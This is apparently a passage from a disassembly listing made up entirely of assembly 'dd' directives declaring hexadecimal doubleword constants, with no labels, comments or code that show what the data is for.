		dd 362C82E8h, 33B48C39h, 0E9C14C5Fh, 0D2063E82h, 0D514411Dh
		dd 602BFEC4h, 78B069B5h, 6F8EBFDEh, 72A6FC6Eh, 48EE26A5h
		dd 52D0AA92h, 0EB1D8C48h, 2B3F5762h, 6A1FB7F4h,	0E8C17874h
		dd 0B9C524DAh, 3C9354AEh, 50BF59C9h, 821FA946h,	0C430CCFCh
		dd 4CD47D5Eh, 95D655C5h, 42418652h, 0D638CEC5h,	0B9B2A6C6h
		dd 7AD8955h, 9131BF44h,	68CDB28Fh, 5554EA52h, 442AE88Ah
		dd 43EDA24Dh, 0E0061D99h, 97464080h, 0F03E02B3h, 0FAC1B8D0h
		dd 0C6D2E83Eh, 7C98D82Fh, 82DC2F5h, 0C6431FD4h,	0AF34FC29h
		dd 0CA101316h, 40587C53h, 88D1B98Dh, 8F3D6867h,	3F91C534h
		dd 0F1401771h, 62EEF078h, 38492492h, 0A580D935h, 9B600406h
		dd 869177BDh, 0C0F2A5B1h, 9A5669D0h, 38BB26D2h,	3160C86Ch
		dd 0C3560B55h, 5A00E698h, 0E0EFDCB2h, 0A78892B3h, 29B8BE45h
		dd 0BC4AEBF1h, 12EA832Dh, 4CAEC653h, 0DB5D8CC9h, 24F2D417h
		dd 2021D6Bh, 0EA12AB5h,	0ED81CE42h, 2674179h, 0B08BA62Eh
		dd 925A0765h, 9D6D8B52h, 3A19ABF9h, 0A765142Ah,	9CF9D95Bh
		dd 0D220FBh, 8DF37215h,	0ADC67B78h, 6C2FB03Dh, 9B25178Fh
		dd 0E2A2F2E4h, 0FF42B12Fh, 4DFA6FB0h, 7DFFC2Bh,	0E79B19BDh
		dd 0F9C37DC4h, 6861C712h, 1215783Ch, 89A7AFB5h,	4F2E43A4h
		dd 0BDF76ED8h, 2992EBDEh, 0F9F2E85Ah, 96628A85h, 0A2A747Fh
		dd 1F0278D7h, 0EAEB8AF5h, 6BB54C63h, 2B823F11h,	0F8F91B41h
		dd 2EF5FE1Dh, 6B0A289Eh, 0E5FFC9C1h, 80A1FF9Dh,	137177B5h
		dd 9C5468F5h, 3940392Ch, 0D43EBFBEh, 5E6B16CCh,	93BA3014h
		dd 0D63786A9h, 44FA1CC0h, 74EDAD8Ah, 0E03C0D12h, 8BF3FCACh
		dd 2AB0C226h, 8574A25Ah, 56EAF976h, 0E45B44BAh,	0D2817A87h
		dd 61A1153Ah, 865E870Bh, 0D8C4DDACh, 4A3A138h, 0E6AA0D60h
		dd 10517C56h, 516E0EF8h, 0A21704CBh, 19E055DAh,	691D0ACEh
		dd 0E68942C5h, 0AE5FE25Eh, 0A68939DAh, 74ABD3B4h, 0E17E80B8h
		dd 246E885Ch, 0AF41A882h, 5E7EBE9h, 77FB3579h, 934F14FFh
		dd 298E8A3Fh, 632E12DFh, 0C18DEEADh, 563F2842h,	0CABA949Dh
		dd 254EB336h, 0B78ABB75h, 7303D12Dh, 7D119FD7h,	0A714E770h
		dd 8FF33FBEh, 75D5E435h, 2ACA43F1h, 3FE57EE1h, 0C2CBE231h
		dd 0CE9C0B67h, 107F96A0h, 8E46FBACh, 0A1DB0CC7h, 8E75DF77h
		dd 0AEE92D1Fh, 6EC249F2h, 539ED1DBh, 6EBC4AB7h,	0ABF08437h
		dd 0F966F8C0h, 0EEC2D438h, 22B95F38h, 0C71BDBB7h, 0D53BC1F1h
		dd 2D5CB096h, 8ED1FAB4h, 3703093Ch, 0FF7E85CCh,	0D0FE6ABDh
		dd 1E9989E5h, 25D4EDF8h, 0F81FA25Dh, 47DEBFB8h,	0CE53C4C7h
		dd 14D3BE82h, 5239BEB9h, 0C73EFB0Ah, 80872A1Fh,	0FBA71A57h
		dd 0F7BE236h, 5005BE98h, 2B46CAAFh, 43AD3C31h, 46415A19h
		dd 1FC029B5h, 941F4771h, 0C48AF86Dh, 5974D1BAh,	8F054FD9h
		dd 0B6C6CFABh, 591555DFh, 98FCACA3h, 37DFF026h,	0BAC0A76Eh
		dd 5854DCFAh, 0C8AEC957h, 478B9BE1h, 4868B389h,	0DC30763Bh
		dd 2DAEF312h, 0C2D288C2h, 0C341C14Dh, 9BBF2E87h, 0C8AC595Ch
		dd 0B3017E0Bh, 0D0AF626Ah, 39D91559h, 10655FE8h, 0D88A1FC8h
		dd 10971950h, 52254E39h, 3CF36690h, 3AAE3CAFh, 0F3198276h
		dd 570FCCE9h, 99239B0Fh, 0F15F069Dh, 9F2D57FCh,	19620A4Ah
		dd 548DD7B7h, 61E353B5h, 0A8B2EEB5h, 78AC27B1h,	63445365h
		dd 9ECD23A4h, 8C9D31EFh
		dd 0A3BAE539h, 8AFDAA97h, 3EFD6A18h, 595FC008h,	0E555227Ch
		dd 0E268EE7Eh, 0B365C6F5h, 1209BF8Ah, 35B1D545h, 8311FECFh
		dd 44D07DC2h, 0EDD87D9Ah, 0AB04D09Dh, 2FD14176h, 0FECC155Bh
		dd 169B68B9h, 5E87B8FAh, 0FAC73BF4h, 0EFEABF38h, 8A3837F7h
		dd 0AD1387E2h, 3A16C654h, 1AB9CA06h, 0AEE7EE59h, 0CEE64DC3h
		dd 34C0A4BFh, 928E4D52h, 0BFC6F27Ah, 0C4E98C04h, 4F6409C0h
		dd 0B10DCBF0h, 9CDB3A1Dh, 8884967Ch, 63D0A52Fh,	51962144h
		dd 2E1B4A45h, 0D8C5B15h, 0BE6F7CCh, 989D6F70h, 2CF9043h
		dd 5762CE99h, 0F5EEB27Ah, 6E2AC7F1h, 468281Ch, 9320D999h
		dd 0DFDF1E75h, 96EFA4B9h, 1998EA23h, 244E5A59h,	0AD721C71h
		dd 6D2589C8h, 1DB72CFFh, 0F6827CE0h, 2BB5F555h,	4A8EAEE0h
		dd 0DF078420h, 93C4BF4Ch, 0BC307A62h, 2FEE561Ah, 73B75AB6h
		dd 0B2CEAA82h, 1B14AD82h, 196DFF61h, 7C3B8BB6h,	0BA40BCF5h
		dd 6638E82h, 8BF18F2Bh,	0F7CE0780h, 0C24368A5h,	0E0AB5A97h
		dd 2D426321h, 8A0E1F5Dh, 0D258EB2Dh, 0ADD0545Fh, 75874A93h
		dd 39576032h, 1BD6D61Bh, 55558F2Eh, 27FFA3A9h, 0B384FB61h
		dd 0F8BE60ADh, 7E93754Ah, 7A023B5Dh, 0C505411h,	0CC6E960Dh
		dd 5B0A80C6h, 0FAAA130h, 0D41847F0h, 1B27A8F7h,	6939DA3h
		dd 0C8588D5Fh, 0B1181E1h, 0AF3DEE83h, 29DC5F21h, 0E0F18053h
		dd 8CCF90E0h, 994A4C84h, 226D66EBh, 155268FFh, 4E3CFDFEh
		dd 4593B4B1h, 0D12FD9ABh, 41D84153h, 25D1F439h,	0C85EC213h
		dd 535155B2h, 1240796h,	0C61FB993h, 10DA3D0Ch, 0C24F9D0Ah
		dd 0BA6FFAF1h, 0F936ACB8h, 92ED91DCh, 37D8101Eh, 66258149h
		dd 870C1FCDh, 2F53AFA4h, 212DE344h, 393F5CEAh, 0BAD1DA8h
		dd 73949628h, 9433C8Ah,	0B372531h, 3D3F7451h, 5D29C31Ch
		dd 1B8A1DB3h, 170B54C4h, 0CAE4FE17h, 7F6D469Ah,	0AAC85A47h
		dd 70DD85Bh, 285ED76Dh,	0EAD95B8Dh, 0C20B8C5Fh,	11E98FA2h
		dd 4460D00Dh, 5A8E6930h, 0B32E7FE9h, 1CD699Dh, 0B88A92AAh
		dd 0BEF53E61h, 4A9D783Fh, 0BBC4F402h, 1B7A21Dh,	1A1CE05Eh
		dd 6EDA2B21h, 8B9CAF9Eh, 8E1CD636h, 6C065D3Dh, 0C8DE6613h
		dd 77721A1Ch, 0F354BB4h, 0DAC5E521h, 62B2F557h,	0AA763B35h
		dd 67685842h, 7E6837E2h, 0AD428816h, 5C2E4DF7h,	0A9C31255h
		dd 7BF7F265h, 4A861CFCh, 5340706Eh, 8ACDE913h, 488CCFCh
		dd 0F34E1D69h, 87E37B9Fh, 0A6ED3D5Ch, 3C0FA27Ah, 0AEC43A3Ch
		dd 0FCE98F8Dh, 2FB36F4Bh, 326A7F2Ch, 0A4EE3A0Dh, 0C6532B62h
		dd 5DDD0AEFh, 0DB3AB9A8h, 51AB628Ah, 29625524h,	7EF36D14h
		dd 0FC47585Fh, 85066819h, 68BFD351h, 381E05F4h,	0AB9DA532h
		dd 2B4FEF5Ah, 5E245091h, 5DEED854h, 3E05BAB3h, 0F5F499F4h
		dd 0E02BCD57h, 0AED2C87Ah, 0DB436CCDh, 2695DD85h, 0EE2E194Dh
		dd 7B3450C5h, 9E278A36h, 0DAA02B0h, 6EC40791h, 0D4FDE2FDh
		dd 1406E030h, 0D9BE581Fh, 6C949954h, 0EADB5604h, 1CBFB2E7h
		dd 31CB0E36h, 2FF10A8Fh, 0B03B6331h, 0D86C9D48h, 1586F1D5h
		dd 0C7689AD1h, 780E2920h, 9B8F385Eh, 5D24C3AAh,	3D1BBC19h
		dd 0F9081365h, 0EA7480Fh, 0FC982F42h, 0F8723B47h, 0B0DAB22Eh
		dd 640A1931h, 0F491BE8Eh, 24EA7361h, 47CFD8DEh,	79F2FDDAh
		dd 92BD94FFh, 0BF06B236h, 0BAD3B27Fh, 0CA0440ECh, 1DBB3F2Ah
		dd 50A4690Dh, 687B3585h, 0BC15CA5Ch, 0DDC7F2FEh, 15DCCB94h
		dd 7C35CFE1h, 5E5DEDE0h, 21BD6FBAh, 0FBCF6F4Ah,	436D5AA6h
		dd 0AB38036Fh, 0E6DD7426h, 0FD8C9A2Bh, 97B26AABh, 0F86BFE5Ch
		dd 212D05E1h, 675F85E0h, 8E721149h, 71A49A58h, 0ACBC7BE1h
		dd 3F5692EFh, 2C0CB687h, 3F6E899Dh, 0B6A13FF6h,	4507D9FEh
		dd 0A3BAB6CBh, 0E2B7D35h, 0E4C93E5h, 0D85CE709h, 0DE8E1A5Fh
		dd 2F68EFA2h, 2BFC0F3Ah, 66ADA2C5h, 4CF4933Eh, 0CEA23FF7h
		dd 73689DD4h, 0A1CCE707h, 0D5A5BA25h, 0D6886EC9h, 1B852D1h
		dd 75F44924h, 52E876C5h, 6C1EEC1Dh, 3CF4FC76h, 7EA80F90h
		dd 0FB6A37DFh, 0BBB4BAC4h, 3592D88Ch, 42B33D68h, 0E771F7FCh
		dd 885AC1A1h, 0E30420E1h, 9B0F91D9h, 17424D33h,	3BE4C162h
		dd 132A12A3h, 84606EDh,	827EEFC1h, 21D008A5h, 0B52C2A00h
		dd 796008D2h, 66650F1Ah, 5711D2D5h, 8E75EBCAh, 494BC3D6h
		dd 7CF2AB79h, 27FC3555h, 0F584A67Dh, 0F8D86240h, 3A674061h
		dd 734E57D4h, 570331B7h, 0BA23C3ECh, 0F2BFAA16h, 97D8F055h
		dd 0DDA5239Dh, 86D131h,	0C5FCD66Dh, 0BECE9F1Ah,	2903703Fh
		dd 0C7835E7Fh, 60E75985h, 0D2E8E8D5h, 2E1B1F1Bh, 3ECCD0DDh
		dd 0CE7EFC10h, 0DA966607h, 781AD16Ah, 1B3EA2DDh, 19557576h
		dd 3E16367Fh, 0D4BF7E04h, 4AA1CCEFh, 80FDB35h, 6D7A9303h
		dd 7484748Fh, 260BE395h, 3848C836h, 1A8AD8EBh, 935E91E9h
		dd 0FCEBE7D2h, 3898BB97h, 3AAA7795h, 6FB722D4h,	0BD2D701Eh
		dd 0DC4E3F45h, 0F75A05F2h, 0B9F37DE1h, 6BE927E4h, 0E67011EBh
		dd 0AECC6167h, 1C0FFC06h, 85D8BE1Ch, 54954216h,	73F836F3h
		dd 0A6921B2Ch, 1C44A84Fh, 602EFF41h, 0BFCADDCh,	0A78E7AB8h
		dd 464F0775h, 49724D26h, 3F70FC5h, 0C6726091h, 2BEB05EFh
		dd 0F45FA059h, 0B50B43F6h, 4312D3E4h, 9A97AFB8h, 0B1B057B9h
		dd 8CEDBF58h, 12121451h, 99FA5095h, 0E4576922h,	5CA2DB30h
		dd 0BFFBE13Ah, 293291A6h, 3F3FAA9Bh, 0DC9F6FADh, 868E0834h
		dd 29417140h, 845A647Bh, 979F9028h, 69722185h, 133550D7h
		dd 0B45E352Bh, 0AC8D717Ah, 0AB10FD7Ah, 2877DC9h, 0B5A1B131h
		dd 0ED15E0FCh, 682F7BE7h, 8CE2C812h, 74EE181Fh,	0B7E1F873h
		dd 4F231B54h, 0CB4B0655h, 0F57E711Fh, 0ADB128CAh, 0FEF75B11h
		dd 86F69166h, 5D55E74Ah, 0BCD3377Ch, 76984CD6h,	9B76BB70h
		dd 0F46D3DD0h, 4AF1AB32h, 0E4E89063h, 0D1CFD044h, 0D696155Eh
		dd 752B5501h, 4950AE91h, 0D180DBBDh, 0BE5360B2h, 0DFB1BF2Fh
		dd 0CCC0D908h, 0F5E933E7h, 30A8C8C0h, 6F166BBFh, 0E031103Dh
		dd 2F1B0783h, 48EA75CCh, 0F4B33467h, 0F7546633h, 0EF66022Eh
		dd 93D1ABD1h, 0C925A181h, 1F8EB388h, 55DC6E6Bh,	793CCF6Ah
		dd 0F62F8047h, 42402B25h, 204074B6h, 6B1ABB19h,	12B1E8FAh
		dd 0E8F8942Fh, 0AFAAF279h, 884ABF84h, 2BDB0A32h, 4C8DF865h
		dd 6EA374C6h, 0C7CA3EA2h, 0E44639ADh, 0E680A368h, 0FCA1D7E0h
		dd 0D55FB5E1h, 6602837Eh, 437F098Fh, 2F6CEBB6h,	0D71261F8h
		dd 2CBC37F7h, 9CCA55EEh, 5171DA7Dh, 6A8CC834h, 45F4356Bh
		dd 1E6F045Fh, 74743616h, 0AD149C85h, 36FE8DEBh,	7E4E5DB6h
		dd 0B7CC053Ch, 0A26307FBh, 0EFBADDA2h, 0B663A68Eh, 9253343Ah
		dd 0A2FC03F2h, 87CB699Bh, 672D2E35h, 56B72FA9h,	0A57816BEh
		dd 0F0BAEE2Ah, 65F523A1h, 0A7522368h, 0A5412555h, 4D54493Fh
		dd 1D1492E8h, 85986C3Fh, 0BAB743FDh, 53F59A64h,	79A4CD68h
		dd 20AE3BEAh, 93D793AEh, 0B8C7ACF2h, 0D3F5D852h, 0F87D8356h
		dd 2304CCFDh, 4A13FE86h, 5CAC1532h, 5F934F94h, 0C5A2DFF4h
		dd 68B4DFFCh, 0DA542D4Ah, 0A785DF07h, 181EFE96h, 568AF92h
		dd 0E59125E2h, 0B40BE07h, 15384693h, 0E88F54F7h, 0D95AC7DEh
		dd 0C8A357DDh, 0C5B73968h, 7BA44814h, 8CF9A732h, 61A42A16h
		dd 83039570h, 0BDDFAA29h, 5664DC81h, 0DA1A2AE4h, 3B1F35D1h
		dd 97E3C5B4h, 31C755AFh, 9E497760h, 0E2E83E2Eh,	0EAF6671Ch
		dd 1262B925h, 0DE328E64h, 5A59EB28h, 9B0E6E25h,	73D4BB6Eh
		dd 0F6178225h, 459CAF3Ah
		dd 8136C4EDh, 537798Ah,	3F0D4B7Ch, 0DA0C0D34h, 7DDB6657h
		dd 70D8FC48h, 0FC6F8EF0h, 4F1DA8D0h, 7B3C05F6h,	4E07638Bh
		dd 1FF67F29h, 49FE3533h, 2EE77CBEh, 172B99F5h, 0EF1E51B9h
		dd 7EC9CFE3h, 575540BBh, 9C0843F1h, 8AE4F97Eh, 7F998F0Fh
		dd 0A3807D51h, 0BF9A0EADh, 479E083Dh, 0E7F6C264h, 0E6D08872h
		dd 75745284h, 55A57472h, 0E2E286EEh, 0A0894046h, 0D6CB2B4Eh
		dd 49780BE8h, 8CECF8A2h, 0DD0AFED6h, 67027559h,	0C7AE4B57h
		dd 0D52116DFh, 4DB2FB5Bh, 81BEC688h, 162D7980h,	0E6E154F7h
		dd 3A28162Bh, 83A88654h, 6B549489h, 0F6E61FD7h,	0C2273F13h
		dd 345E8B02h, 0F658EF49h, 485014A3h, 1C2F7E0Ah,	161A1137h
		dd 41B50EC2h, 9D4DEFE7h, 6054C353h, 0C48FCBF7h,	6A2233E3h
		dd 689E4B96h, 0AF4EA139h, 1F88ED16h, 941C5D36h,	0A475A06Fh
		dd 7B83BA27h, 284C9ABCh, 7D5803E4h, 0A087B27h, 0CD716255h
		dd 9A66BA69h, 1872326Dh, 0D3EB7BFEh, 6E80AA91h,	20DE08E4h
		dd 0DAFDBBD2h, 1015675Fh, 86F333F4h, 0D144D4FBh, 0EEA9BBF4h
		dd 93AED5B3h, 0A7A8275Eh, 58CE9F78h, 79F0686Dh,	7C15BCDDh
		dd 0AFCC8AE0h, 0BF50D57h, 1595FD1h, 10AA5F29h, 0A9E43023h
		dd 0A677AA8Fh, 3018C2ACh, 0E8BFAF54h, 0CCA6E0EAh, 315159C2h
		dd 0C4211273h, 4C0552EBh, 0C0BF905Ch, 68ED6AEAh, 5ED196ADh
		dd 6B94F87Fh, 0D5476DEBh, 0CA2BCB31h, 8F9ED634h, 6015C034h
		dd 83BDA07Ah, 0BED09F2Eh, 5892064Ah, 0C041C85Bh, 0C7B6E87Ah
		dd 968E7AC7h, 0AD9AFC2Eh, 50CCCDDDh, 74A4C10Eh,	0B340299Fh
		dd 8E402578h, 0DAD27B62h, 85EEFE2Bh, 0E829F215h, 0DCFCB499h
		dd 3F9E5298h, 812411D8h, 0A0BC9C6Bh, 0FFF1596Ch, 0BEE1F173h
		dd 34BD65DAh, 0BED8649Ch, 0FC6ED7C4h, 0BFE7D7DCh, 0C496DC8Fh
		dd 4A3108A9h, 1AE9C57Bh, 0C7B1BE5Bh, 287E3FDCh,	14532E71h
		dd 57B8DE81h, 3DD344E8h, 7F1ED0D4h, 1D863D07h, 0A6FA0B33h
		dd 0CD42F63Dh, 0F91DAF30h, 0F8B943F0h, 342A22F7h, 57030962h
		dd 3D42A2C9h, 2B8F4576h, 0C2B74D52h, 9F8269B8h,	381541ADh
		dd 44C8AF22h, 473B92EFh, 3C319CC3h, 0E55B7CCAh,	0C3F012FCh
		dd 3090FEAEh, 5F38725Fh, 0BF0CFAE8h, 41D15C1Ch,	6F769F31h
		dd 3EDC768Bh, 8A888070h, 0E25F93B3h, 0C0B5EC16h, 8FB49758h
		dd 0DD435E7Fh, 19C0C548h, 0ED18F1D5h, 81AD8455h, 0AC49BCAAh
		dd 235B1CCBh, 29CE6DA1h, 0FAE25085h, 0AB4B1881h, 997A50BEh
		dd 0E44A8B39h, 61C0BBA0h, 0BC6BFC5Eh, 0D9B57046h, 0FC0991BBh
		dd 0C4CC8EC9h, 33876C64h, 0DCA794F9h, 0E0389052h, 2E2798FDh
		dd 55593E8Ah, 5DFF0D4Ch, 123D1D09h, 0EC4BAA08h,	0C3C7FD0Dh
		dd 7CEE9D4Ah, 3362A27Ch, 70FA657Dh, 4870572Dh, 0E70D41B0h
		dd 0B0827CD0h, 7C1825FCh, 0F8563693h, 2C0F6D3Eh, 73A2F57Fh
		dd 0E6599ED9h, 0E334E602h, 49BFAF87h, 537EE6DCh, 2A96BECEh
		dd 0D261958Dh, 9ACD57A9h, 5D57257Bh, 7D876AB1h,	92D163C4h
		dd 0C3E4AC57h, 0F8EB282h, 0B79BD5BCh, 0FF54399Dh, 905D2FF3h
		dd 2D1D63BFh, 8B09F876h, 0F2DD1CD3h, 40971A2Ah,	0C87EC1F0h
		dd 0C577F694h, 0ECBA0645h, 501F4A26h, 875E2FB3h, 7670633Fh
		dd 0DA214A3Eh, 4D35CAAh, 7E193527h, 0A21F1D20h,	0AA726B75h
		dd 0EABB809Eh, 9D5B98BBh, 0FDFA2F13h, 0D032C5E9h, 67EE67DAh
		dd 575D1Bh, 0D257719Dh,	0D19DE8A5h, 4924E5C0h, 0F3A3F2AFh
		dd 0A7C4897Eh, 0D9236A2Eh, 727FE01Eh, 5B73E951h, 20C7E06h
		dd 0FC6B0B5h, 8845FABh,	0E175A940h, 61FE8FEEh, 9A371BBh
		dd 0A8BF4ED2h, 4D45A0E2h, 94A16514h, 0E3C0A335h, 3FA78C17h
		dd 0DAFBACD7h, 0B89351B3h, 0A06A6D38h, 0A0B1B998h, 0D537E26Ch
		dd 0DB461D3h, 82B7AFCBh, 94EE84AEh, 0A4F68788h,	7D3E56B6h
		dd 0D3EF9988h, 7C2458E7h, 9990C38Fh, 739FD20h, 9D8B6945h
		dd 12B868C2h, 0D729CC2Bh, 7D12FD1h, 24C550C6h, 422E462Fh
		dd 685E17F8h, 2058F75Fh, 0C2CAFBADh, 94D953D5h,	876CAF14h
		dd 0E1D73234h, 0A3B5D5A7h, 17CEBD1Bh, 0AB1FC4C4h, 0F286A226h
		dd 0D6B0576Ch, 2BA0C4CBh, 0CDB8EB53h, 0C056E336h, 77564554h
		dd 0B88C1EFAh, 5552654Dh, 0E2DC3313h, 0D64EF0E9h, 3EAFA7A3h
		dd 72510F36h, 4B855BB1h, 634D98AFh, 472F7C5Eh, 1A7F514h
		dd 51001D64h, 6998C5E6h, 3A26BD7Ah, 0D93C999Eh,	4BFEBA26h
		dd 26969034h, 0E286FBDh, 255B6E0Fh, 69DE043Eh, 37D944ECh
		dd 0E9FC7448h, 41924F63h, 8EAF88C9h, 43F13F23h,	0B05BB928h
		dd 70DC3F2Ch, 3DD8D2DFh, 8F6FAFCDh, 0FBFBB095h,	3E9C156Ah
		dd 4341F3ADh, 10DB17BAh, 0B6478851h, 0B41FDF21h, 0AB8E4E0Eh
		dd 5C3CE249h, 17FE826h,	31CD1F5Bh, 0A8120F6Ah, 4E1F76B3h
		dd 0F542085Fh, 69228ECEh, 5E8011D0h, 0B9BC595Eh, 17942D76h
		dd 50BC0F03h, 25BEB49Ch, 0BEEC82F9h, 47C8C030h,	6AD2C472h
		dd 0A4F2AC3Ah, 976FB26Fh, 0E12A7C3Dh, 0FB538C4Dh, 0DDD617DAh
		dd 0D81912D8h, 6183ECACh, 771CC735h, 0F96A0905h, 0C7449BCDh
		dd 8FBC73F7h, 0BAAF259Eh, 43E7A76Fh, 254B233h, 0C0727419h
		dd 0C6C23E80h, 0BA6FF537h, 25933C18h, 0CF61CBB0h, 0C51CEC44h
		dd 265268E9h, 0C1C3B148h, 0F3DBB10Fh, 8B2C2E6Fh, 45715407h
		dd 66A2AC6Ch, 2499305Eh, 0AC88AACh, 51A15B48h, 576E4B5h
		dd 953EE74h, 0F5F0735h,	0A3ED598Ch, 0E9FD6371h,	0F7F840B7h
		dd 4B821CACh, 0B174264Ah, 0C38557E5h, 0A6F2CD9Fh, 0D9023B3Eh
		dd 925F97DAh, 0A75D662Bh, 0E31727D2h, 322B553Bh, 758C187Eh
		dd 6A2DED51h, 0DB457825h, 0D5A21F57h, 0A38F2446h, 47554A95h
		dd 91273384h, 7EFCED22h, 0F7C3BDE7h, 2B472823h,	62566377h
		dd 20EBDF79h, 0AE97ED10h, 1FF117D4h, 6C40F3A9h,	0E214945Ch
		dd 0E6D671BAh, 65D2F133h, 1FD35A68h, 0FA54BAABh, 9D40F8E2h
		dd 64BC5CD6h, 0F99770C2h, 2B5AA3A7h, 0B5BEBBE2h, 0FA30339Fh
		dd 264EFEFh, 0B824BEF2h, 0D4C41D36h, 5C9F4CAAh,	80B58F93h
		dd 30D0016Fh, 50F9A2FFh, 7A55755Ah, 55E754A3h, 57C123CFh
		dd 161A735Ch, 40583AFh,	35D93A5Fh, 60EB61D9h, 0DC73D4CEh
		dd 6E111BB3h, 0A4B78BFBh, 0A154006Ah, 322C2985h, 76011A6h
		dd 458A3C68h, 0CF2ADA0Bh, 9E87DBDDh, 0C049D07h,	0F4F0A7BBh
		dd 5F668B57h, 0E3000485h, 36818DA4h, 9312ACFAh,	29842E2Fh
		dd 0D771BE9Ah, 0EF3EC8F0h, 25AADCE8h, 8BAE6B02h, 0DB984162h
		dd 66A739F5h, 0FBF6E132h, 0FB9D01E9h, 0D8298177h, 0C46C8255h
		dd 3E3275Eh, 677466B7h,	0FCEFD252h, 0EA82571h, 7AC34F38h
		dd 0DFC574DBh, 1757B82Ah, 0FEBC830Eh, 621875BDh, 15220D7Bh
		dd 376A7E6Ah, 4E359D35h, 0DA8E45A0h, 66E71985h,	6AEA5772h
		dd 8FA3D878h, 0AEE20457h, 8BF8F290h, 34D9206Eh,	0A51C360Ch
		dd 295A3DA3h, 1F4A731Dh, 7A4695D4h, 0DA210495h,	45A1A367h
		dd 0A173B213h, 53A82D5Dh, 0B2CFD0E0h, 0D9319D5Ch, 4EC5A506h
		dd 0D90988F0h, 6D1B80F3h, 77F2E5E3h, 7DB0DB78h,	3F0F09F0h
		dd 0FA85BCECh, 9F168D34h, 0D3D731B9h, 5F38C099h, 284B43F1h
		dd 0E0743ADBh, 5CA0B7F7h, 744AFEB3h, 0A2F22CC4h, 0E79B74B5h
		dd 4198765Bh, 0DBFCE72Eh, 0E6EDE808h, 72E65A34h, 22FE51B4h
		dd 81F0558Eh, 18F396C9h, 3429D13Ch, 0D606E5FDh,	8EADE7EFh
		dd 3D9C1F4Fh, 0FB9773CEh, 0F5087E2h, 913F15BAh,	143FB29Fh
		dd 0DC28D299h, 81DC68E2h, 3E6BB870h, 3CD5C8F0h,	63BFA603h
		dd 4BF1C7BAh, 397F87C3h
		dd 39A1A0A5h, 0AACFA77Ah, 892B10C1h, 0C6EA1378h, 8E54390Dh
		dd 5F350D5Eh, 0BE57ED19h, 5C374AE4h, 41FB9A0Bh,	0BA17DAA3h
		dd 739FE818h, 3BBFF9C9h, 0BAC111D8h, 8DE2FAE5h,	817B39Eh
		dd 0C706E56Bh, 69CAADF4h, 8F69383Dh, 34C0E8D1h,	89C4DEB1h
		dd 0FFAE9A22h, 0EDF3DD40h, 0BF57B2ADh, 0E44A4CE0h, 9DBB5A8Eh
		dd 0A2698C13h, 0D2F89125h, 0F440FB73h, 0DAD5E879h, 14057DA8h
		dd 0AC659C67h, 5B0E21ABh, 5547A1DBh, 0F77EB457h, 0F9F024FEh
		dd 4F9D8F91h, 352246ABh, 9C6532FBh, 7E8A5B1Ch, 0A2EB0AC9h
		dd 0D274FF29h, 61D1F5Fh, 0D2EA287Eh, 0F8A88775h, 95E572F2h
		dd 0CD862877h, 0B2B26383h, 5AD281CDh, 3DC32F96h, 70FB27FAh
		dd 8AA7DC52h, 61871B92h, 50EE9FB7h, 8639AFF5h, 0BF2D2027h
		dd 0B47F8EB2h, 3359CBCh, 0B1F1CEAAh, 502E7B6Ah,	0EECF45AAh
		dd 3AE6018Bh, 38743919h, 34F4AA5Ah, 7B44B562h, 1751731Fh
		dd 0A5A2BEFBh, 0EB7E5B95h, 0B236DA6Fh, 0E40A990Bh, 0FEED0318h
		dd 79C0461Ah, 221B7E15h, 0BCFCB475h, 0F0ABCFBAh, 975C4DFDh
		dd 0F2AF8B7Dh, 53076E3Ah, 0B5BD8FC4h, 1BA948A5h, 7C20EFC2h
		dd 5DAD46E0h, 0F21078F0h, 4E66551Eh, 98D59FBEh,	0EA22B2B9h
		dd 8FF64AD5h, 0A40705DDh, 91899C1Dh, 1B18A137h,	462ED047h
		dd 398C85D0h, 1B447533h, 7D509168h, 0C3CAD70h, 0D7989595h
		dd 0B2F6411Bh, 52FC5388h, 8A8D6C9Ah, 0A095E9EFh, 0C254B053h
		dd 37D8538Bh, 140E0ECFh, 0A4E847A1h, 0AA4C4771h, 4DEB345Dh
		dd 7D5263C5h, 0DBB6B560h, 35A7FFA6h, 0E5FE5F95h, 1F92D47Ch
		dd 10375E2Ah, 0EA08F4EEh, 0EF0F0790h, 5219D6BBh, 25601745h
		dd 0F7B82CB7h, 26E904C0h, 9326FB9Fh, 8BF06093h,	1A2ED47Eh
		dd 0D6D9E7B6h, 9D5341C7h, 0AC512EF8h, 0C8C71F87h, 0FAD7502Eh
		dd 475C52B3h, 0CC8E50F5h, 52BE151Ah, 0AF136D07h, 391F458h
		dd 3C733D2h, 0B1151783h, 0DF6DB768h, 0FD149776h, 8025C7B9h
		dd 55F7EAD2h, 4ADD9A03h, 0C55CB865h, 0D0FE547Ch, 5FE364AAh
		dd 55B15F45h, 0DD2AF625h, 0AEF2E07Fh, 0C866B4D7h, 4168CAFh
		dd 4F3FCF70h, 0B94A8ADCh, 50344E5Fh, 0AAEE7DC5h, 1638C1EBh
		dd 2A928807h, 8A381039h, 0A4AABB34h, 0B8BE98EFh, 93F37825h
		dd 0DBA80ADDh, 6D60E1BDh, 2BCB96DFh, 0FDECD0F0h, 8652179Ah
		dd 7EC905F7h, 2F66EB5Ah, 0BAAF0412h, 363B75FAh,	0C8FCD041h
		dd 2A7DA615h, 0BF438BF1h, 7E6FCA58h, 57A4D903h,	0D689AD5Fh
		dd 20D4862h, 99858DBFh,	502083EBh, 0FFC6F694h, 0BB51DA5Bh
		dd 565506E9h, 0D68DE8ABh, 0A53B589Ah, 0FC4694B0h, 94A8A1A1h
		dd 0F64B50B4h, 312E3B77h, 1F82FB19h, 0C4DEE522h, 0C2FAACBh
		dd 8B49D7A7h, 8A8E6AFDh, 0C875F716h, 12A5D2FFh,	0A9F56AD2h
		dd 0F9831966h, 97C028E2h, 0C06DCC54h, 39997BCFh, 38AD1327h
		dd 0EEC9EB56h, 0E9437B8Fh, 56324313h, 9A35A5C9h, 99263733h
		dd 0D18EB1F8h, 0E551276h, 0AFE7BAF8h, 26BDED1Fh, 3CC43700h
		dd 4CC58D2Ch, 7A2011DAh, 4AEF9D94h, 6FCE3469h, 0E82252D9h
		dd 8249BA48h, 4F54D743h, 17BE6FF9h, 4408E23Fh, 0B8C27CC2h
		dd 0AA11B670h, 0AC3364A8h, 852F3532h, 8C3030B8h, 0B416E0AAh
		dd 98DA0A41h, 5CD11055h, 3634D77Bh, 383EC860h, 75B3A078h
		dd 4647F074h, 0F8B158DFh, 57FAFDC0h, 2F74A778h,	85CF553Ah
		dd 0C93692FDh, 9321FDEEh, 870DE1DFh, 0A2518988h, 0C36F275Ah
		dd 3FB7F6D5h, 31DF0AEEh, 4EB48E0Ah, 380FE9AEh, 34902D1Bh
